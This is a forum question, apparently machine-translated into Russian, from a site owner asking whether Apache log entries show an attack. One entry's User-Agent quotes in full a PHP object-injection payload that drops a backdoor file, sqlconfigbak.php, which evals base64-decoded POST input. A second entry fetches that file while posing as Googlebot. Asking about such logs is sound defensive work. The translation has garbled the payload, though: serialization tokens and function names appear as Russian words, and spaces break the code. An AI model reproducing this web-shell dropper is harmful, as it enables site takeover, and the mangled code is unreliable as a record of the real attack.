Записи журнала доступа Apache на моем сайте обычно выглядят так:
207.46.13.174 - - [31 / Oct / 2016: 10: 18: 55 +0100] "GET / contact HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (совместимо; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607
так что вы можете увидеть там поле user-agent. Но сегодня я также обнаружил, что поле user-agent используется так:
62.210.162.42 - - [31 / Oct / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "FC"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; а: 1: {я: 0; а: 2: {я: 0; O: 9: "SimplePie": 5: {s: 8: "Sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "FEED_URL"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT» ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'г0']); @ Eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: GetConfig (); выход;"; s: 19:» cache_name_function "; s: 6:" утверждают "; s: 5:" кэш "; б: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304
Это была атака? Следующая запись журнала, по-видимому, успешно извлекла (код 200) файл, sqlconfigbak.php
упомянутый в сценарии. Хотя я не могу найти файл в файловой системе:
62.210.162.42 - - [31 / Oct / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (совместимо; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 БАЙПАС 10.10.36.125:104 0.244
Пожалуйста, что здесь происходит?